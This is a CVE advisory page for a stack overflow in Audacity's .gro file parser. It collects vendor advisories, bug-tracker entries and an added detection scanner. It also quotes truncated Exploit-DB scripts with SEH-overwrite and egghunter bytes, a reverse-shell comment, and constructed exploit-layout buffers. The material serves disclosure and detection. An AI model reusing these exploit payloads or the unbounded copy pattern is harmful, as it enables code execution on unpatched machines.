CVE-2009-0490
Published: 2009-02-10
Priority: P3 · 51 · critical · CVSS 2.0 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploits available (see the Exploit-DB entries below)
EPSS: 16.63% (96.6th percentile)
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
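The copy pattern the description refers to, as an added illustrative example in C++ rather than Audacity's own code (strparse.cpp is not reproduced on this page, so the real function's signature, buffer size and call sites are assumptions here): a tokenizer that writes one optionally double-quoted, whitespace-delimited token into a caller's fixed stack buffer, next to a bounded version that reports an oversized token instead of overrunning the frame.

```cpp
#include <cctype>
#include <cstddef>
#include <cstdio>
#include <string>

// Illustrative reconstruction of the copy pattern behind CVE-2009-0490,
// NOT Audacity's strparse.cpp (the real signature and buffer size are not
// on this page). Shape: pull one whitespace-delimited, optionally
// double-quoted token from `src` starting at `*pos` into a caller buffer.

// Vulnerable shape: `out` is a fixed-size array in the caller's frame and
// nothing bounds the copy, so a long .gro token runs past the end of that
// frame (on Windows into the SEH record the public exploits overwrite).
static void get_nonspace_quoted_unsafe(const char *src, size_t *pos, char *out)
{
    size_t i = *pos, n = 0;
    bool quoted = false;
    while (src[i] && std::isspace((unsigned char)src[i])) i++;   // skip_space
    while (src[i] && (quoted || !std::isspace((unsigned char)src[i]))) {
        if (src[i] == '"') { quoted = !quoted; i++; continue; }
        out[n++] = src[i++];                     // n is never checked
    }
    out[n] = '\0';
    *pos = i;
}

// Hardened shape: the destination size travels with the pointer, the copy
// stops one byte short of it, and an oversized token is reported (false)
// rather than silently truncated, so the caller can reject the file.
static bool get_nonspace_quoted_safe(const char *src, size_t *pos,
                                     char *out, size_t outsz)
{
    if (outsz == 0) return false;
    size_t i = *pos, n = 0;
    bool quoted = false, fits = true;
    while (src[i] && std::isspace((unsigned char)src[i])) i++;
    while (src[i] && (quoted || !std::isspace((unsigned char)src[i]))) {
        if (src[i] == '"') { quoted = !quoted; i++; continue; }
        if (n + 1 < outsz) out[n++] = src[i];
        else fits = false;                       // consume, do not store
        i++;
    }
    out[n] = '\0';
    *pos = i;
    return fits;
}

// First token of `src` via the unsafe path; only ever call it with input
// shorter than the 64-byte scratch buffer (it cannot protect itself).
static std::string first_token_unsafe(const char *src)
{
    char buf[64];
    size_t pos = 0;
    get_nonspace_quoted_unsafe(src, &pos, buf);
    return std::string(buf);
}

// Walk a whole line with the hardened tokenizer and a 32-byte scratch
// buffer; returns how many tokens were too long for it.
static int count_oversized_tokens(const std::string &line)
{
    char buf[32];
    size_t pos = 0;
    int rejected = 0;
    while (pos < line.size()) {
        size_t before = pos;
        if (!get_nonspace_quoted_safe(line.c_str(), &pos, buf, sizeof buf))
            rejected++;
        if (pos == before) break;                // embedded NUL: stop
    }
    return rejected;
}

int main()
{
    // Constructed input: one 174-byte token, the padding size both exploits use.
    std::string line = "header 1.0 " + std::string(174, 'D') + " tail";
    std::printf("oversized tokens: %d\n", count_oversized_tokens(line));
    return 0;
}
```

The bounded version deliberately returns a failure rather than truncating: a .gro file whose token does not fit the parser's buffer is malformed by definition, and refusing it is cheaper and safer than guessing what the truncated token meant.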
Affected
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| audacityteam | audacity | < 1.3.6 | 1.3.6 |
| audacityteam | audacity | >= 0, < 1.3.6-1 | 1.3.6-1 |
| debian | audacity | < 1.3.6-1 (bookworm) | 1.3.6-1 |
Detection & IOCs (extracted from the sources quoted below)
Byte patterns:
- W00TW00T
- \x44 * 174 + \xEB\x08\x90\x90 + \x22\x23\x17\x01
- \x69\x72\x61\x71\x69\x72\x61\x71 (egg marker "iraq" x2)
- \x57\x30\x30\x54 (egg "W00T")
Notes:
- The egghunter exploit uses the egg tag 'W00TW00T' (\x57\x30\x30\x54 repeated twice); scan process memory or file content for this marker to identify exploit payloads.
- A second exploit variant uses the egg tag 'iraqiraq' (\x69\x72\x61\x71 repeated twice) prepended to its shellcode; scan .gro files or memory for this pattern.
- The SE handler is overwritten; monitor for SEH-chain corruption (pointer to the next SEH record and the SE handler both overwritten) when Audacity processes .gro files.
- The Windows XP SP3 exploit overwrites the SE handler with an address in msacm32.drv (\xbe\x2e\xd1\x72, the sh value in its listing); that address inside a .gro file is a strong indicator of exploitation.
- The exploit in EDB-9501 hardcodes a reverse-shell callback to 192.168.2.3; this is a placeholder the attacker changes, so the IP alone is not a reliable network IOC.
- Fixed in Audacity 1.3.6 and later; all Debian branches resolved with version 1.3.6-1.
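The indicators above turned into a scanner you can run over a .gro file image; this is an added example, not code from any of the quoted sources. The byte patterns are copied from the two exploit listings on this page; the flag names, the 174-byte long-token threshold and the sample buffers (which follow the exploits' layouts but replace the 1000-byte 0xCC pad and the reverse shell with short stand-ins) are this example's own constructions.

```cpp
#include <algorithm>
#include <cctype>
#include <cstddef>
#include <cstdio>
#include <fstream>
#include <iterator>
#include <vector>

typedef std::vector<unsigned char> Bytes;
// Indicator bits returned by scan_gro(); the names are this example's own.
enum : unsigned {
    IOC_EGG_W00T      = 1u << 0,  // "W00TW00T" egg tag (egghunter exploit)
    IOC_EGG_IRAQ      = 1u << 1,  // "iraqiraq" egg tag (XP SP3 exploit)
    IOC_EGGHUNTER     = 1u << 2,  // int 0x2e egghunter stub shared by both
    IOC_SEH_JMP       = 1u << 3,  // EB 08 90 90 short jump written over nSEH
    IOC_RET_MSACM32   = 1u << 4,  // BE 2E D1 72: msacm32.drv handler, XP SP3
    IOC_RET_UNIVERSAL = 1u << 5,  // 22 23 17 01: handler in the egghunter exploit
    IOC_LONG_TOKEN    = 1u << 6   // >= LONG_TOKEN bytes with no whitespace
};
static const size_t LONG_TOKEN = 174;   // padding length both exploits use

struct Pattern { unsigned flag; const char *bytes; size_t len; };
// Byte sequences copied from the two exploit listings quoted on this page.
static const Pattern PATTERNS[] = {
    { IOC_EGG_W00T,      "W00TW00T", 8 },
    { IOC_EGG_IRAQ,      "iraqiraq", 8 },
    { IOC_EGGHUNTER,     "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E", 12 },
    { IOC_SEH_JMP,       "\xEB\x08\x90\x90", 4 },
    { IOC_RET_MSACM32,   "\xBE\x2E\xD1\x72", 4 },
    { IOC_RET_UNIVERSAL, "\x22\x23\x17\x01", 4 },
};

static bool contains(const Bytes &hay, const char *needle, size_t len)
{
    const unsigned char *n = reinterpret_cast<const unsigned char *>(needle);
    return std::search(hay.begin(), hay.end(), n, n + len) != hay.end();
}

// Longest run of non-whitespace bytes: the "long string" of the CVE text.
static size_t longest_nonspace_run(const Bytes &buf)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < buf.size(); i++) {
        if (std::isspace(buf[i])) cur = 0;
        else best = std::max(best, ++cur);
    }
    return best;
}

// OR of every IOC_* bit present in the file image.
static unsigned scan_gro(const Bytes &buf)
{
    unsigned flags = 0;
    for (const Pattern &p : PATTERNS)
        if (contains(buf, p.bytes, p.len)) flags |= p.flag;
    if (longest_nonspace_run(buf) >= LONG_TOKEN) flags |= IOC_LONG_TOKEN;
    return flags;
}

static void put(Bytes &b, const char *s, size_t len) { b.insert(b.end(), s, s + len); }
static void fill(Bytes &b, size_t n, unsigned char v) { b.insert(b.end(), n, v); }

// Constructed buffer laid out like the exploits on this page: 174 bytes of padding,
// nSEH jump, SE handler, NOP sled, egghunter carrying egg4, stand-in pad, egg8, payload.
static Bytes build_sample(const char *handler, size_t nops, const char *egg4, const char *egg8, size_t pad)
{
    Bytes b;
    fill(b, 174, 'D');
    put(b, "\xEB\x08\x90\x90", 4);                   // nSEH: jmp short +8
    put(b, handler, 4);                              // SE handler
    fill(b, nops, 0x90);
    put(b, "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8", 18);
    put(b, egg4, 4);                                 // egg the hunter compares against
    put(b, "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7", 10);
    fill(b, pad, 0xCC);                              // stand-in for the 1000-byte pad
    put(b, egg8, 8);                                 // doubled egg tag
    fill(b, 8, 0x90);                                // stand-in for the payload
    return b;
}
// Egghunter exploit layout (universal handler, W00T egg) and XP SP3 layout (iraq egg).
static Bytes sample_egghunter_variant() { return build_sample("\x22\x23\x17\x01", 4, "W00T", "W00TW00T", 16); }
static Bytes sample_xpsp3_variant()     { return build_sample("\xBE\x2E\xD1\x72", 20, "iraq", "iraqiraq", 0); }

// Constructed benign sample: short whitespace-separated tokens only.
static Bytes sample_benign()
{
    const char text[] = "alpha \"quoted token\" beta 1.0\n";
    return Bytes(text, text + sizeof text - 1);
}

int main(int argc, char **argv)
{
    Bytes buf = sample_egghunter_variant();          // default: built-in sample
    if (argc > 1) {
        std::ifstream in(argv[1], std::ios::binary);
        buf.assign(std::istreambuf_iterator<char>(in), std::istreambuf_iterator<char>());
    }
    std::printf("ioc flags 0x%02x, longest token %zu bytes\n", scan_gro(buf), longest_nonspace_run(buf));
    return scan_gro(buf) ? 1 : 0;
}
```

Run it with a path to scan a file; with no argument it scans the built-in egghunter-layout sample. The fixed byte patterns catch the two public exploits as published, while IOC_LONG_TOKEN catches any rebuilt payload that keeps the overflow but swaps addresses and shellcode, which is why a triage rule for this CVE should key on the oversized token and treat the addresses and egg tags as confirmation.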
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| osv | | 9.3 | CRITICAL | |
| vendor_debian | | 9.3 | CRITICAL | |
| vendor_redhat | | 9.3 | CRITICAL | |
Red Hat
audacity: stack-based buffer overflow
vendor_redhat · 2009-01-02 · CVSS 9.3 · CRITICAL · CWE-121
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
Debian
CVE-2009-0490: audacity - Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in...
vendor_debian · 2009 · CVSS 9.3 · CRITICAL
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
Scope: local
bookworm: resolved (fixed in 1.3.6-1)
bullseye: resolved (fixed in 1.3.6-1)
forky: resolved (fixed in 1.3.6-1)
sid: resolved (fixed in 1.3.6-1)
trixie: resolved (fixed in 1.3.6-1)
GHSA
GHSA-8f8x-6454-8222: Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse
ghsa_unreviewed · 2022-05-02 · HIGH · CWE-787
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
OSV
CVE-2009-0490: Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse
osv · 2009-02-10 · CVSS 9.3 · CRITICAL
Stack-based buffer overflow in the String_parse::get_nonspace_quoted function in lib-src/allegro/strparse.cpp in Audacity 1.2.6 and other versions before 1.3.6 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a .gro file containing a long string.
No detection rules found.
Exploit-DB
Audacity 1.2.6 - '.gro' Local Buffer Overflow
exploitdb · 2009-12-05
---
#exploit.py
# Audacity 1.2.6 (gro File) Buffer overflow Exploit
# By: Encrypt3d.M!nd
# http://m1nd3d.wordpress.com/
#####################################################
# I know this exploit has already been posted, but the author
# used an address as a universal one; well, it's universal, but
# it can't be called to jump, because it causes a privileged
# exception, so you can just use it.
#
# Tested on: Windows xp sp3
#
chars = "\x44" * 174
ns= "\xeb\x08\x90\x90"
sh= "\xbe\x2e\xd1\x72" # Windows xp sp3 - msacm32.drv
nops= "\x90"* 20
eggh= "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x69\x72\x61\x71\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
shellcode= "\x69\x72\x61\x71\x69\x72\x61\x71"
shellcode+= (
"\x89\xe6\xd9\xc7\x
Exploit-DB
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
exploitdb · 2009-08-24
---
#!/usr/bin/env python
#
# Audacity
print " [+] Creating eviL .gro file..."
buff = ("\x44" * 174)
buff += ("\xEB\x08\x90\x90")
buff += ("\x22\x23\x17\x01")
buff += "\x90"* 4
buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x57\x30\x30\x54" # this is the egg...
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buff += ("\xCC" * 1000);
buff += "W00TW00T"
# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4
Exploit-DB
Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)
exploitdb · 2009-01-01
---
# -----------------------------------------------------------
# Author : Houssamix
# -----------------------------------------------------------
# Audacity 1.2.6 (.gro file ) Local buffer overflow POC
# download : http://audacity.sourceforge.net/
# Audacity® is free, open source software for recording and editing sounds.
# Description:
# When we select: project > import midi.. and we import a ".gro" file containing long chars,
# the program will crash and the following happens:
# EAX:05050504 ECX:01414141 EDX:01520608 EBX:0012F154
# ESP:0012EF10 EBP:00000000 ESI:41414141 EDI:00000000
# EIP:006AEC54 audacity.006AEC54
# Access violation When Reading [41414141]
# And Also The Pointer to next SEH record and SE Handler Will gonna BE Ove
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow [Fdevel]
bugzilla · 2009-02-10 · CVSS 9.3 · CRITICAL
Fdevel tracking bug: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes in the 'blocks' bugs.
NOTE THIS ISSUE IS CURRENTLY EMBARGOED, DO NOT MAKE PUBLIC COMMITS OR COMMENTS ABOUT THIS ISSUE.
[bug automatically created by: add-tracking-bugs]
Discussion:
Sorry, this isn't actually embargoed so please disregard all the yelling in the previous comments.
---
This bug appears to have been reported against 'rawhide' during the Fedora 11 development cycle.
Changing version to '11'.
More information and reason for this action is here:
http://fedoraproject.org/wiki/BugZappers/HouseKeeping
---
Why am I (and the other co-owner) missing in the Cc
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow
bugzilla · 2009-02-10 · CVSS 9.3 · CRITICAL
Name: CVE-2009-0490
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0490
Assigned: 20090209
Reference: MILW0RM:7634
Reference: URL: http://www.milw0rm.com/exploits/7634
Reference: MLIST:[audacity-devel] 20090110 Audacity "String_parse::get_nonspace_quoted()" Buffer Overflow
Reference: URL: http://n2.nabble.com/Audacity-%22String_parse::get_nonspace_quoted()%22-Buffer-Overflow-td2139537.html
Reference: CONFIRM: http://bugs.gentoo.org/show_bug.cgi?id=253493
Reference: BID:33090
Reference: URL: http://www.securityfocus.com/bid/33090
Reference: FRSIRT:ADV-2009-0008
Reference: URL: http://www.frsirt.com/english/advisories/2009/0008
Reference: OSVDB:51070
Reference: URL: http://osvdb.org/51070
Reference: SECUNIA:33356
Reference: UR
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow [F9]
bugzilla · 2009-02-10 · CVSS 9.3 · CRITICAL
F9 tracking bug: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes in the 'blocks' bugs.
NOTE THIS ISSUE IS CURRENTLY EMBARGOED, DO NOT MAKE PUBLIC COMMITS OR COMMENTS ABOUT THIS ISSUE.
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%209&bugs=484953,
---
Sorry, this isn't actually embargoed so please disregard all the yelling in the previous comments.
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&bu
Bugzilla
CVE-2009-0490 audacity: stack-based buffer overflow [F10]
bugzilla · 2009-02-10 · CVSS 9.3 · CRITICAL
F10 tracking bug: see blocks bug list for full details of the security issue(s).
This bug is never intended to be made public, please put any public notes in the 'blocks' bugs.
NOTE THIS ISSUE IS CURRENTLY EMBARGOED, DO NOT MAKE PUBLIC COMMITS OR COMMENTS ABOUT THIS ISSUE.
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=484952,
---
Sorry, this isn't actually embargoed so please disregard all the yelling in the previous comments.
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security
References
- http://bugs.gentoo.org/show_bug.cgi?id=253493
- http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
- http://n2.nabble.com/Audacity-%22String_parse::get_nonspace_quoted%28%29%22-Buffer-Overflow-td2139537.html
- http://osvdb.org/51070
- http://secunia.com/advisories/33356
- http://www.securityfocus.com/bid/33090
- http://www.vupen.com/english/advisories/2009/0008
- https://www.exploit-db.com/exploits/7634
Published: 2009-02-10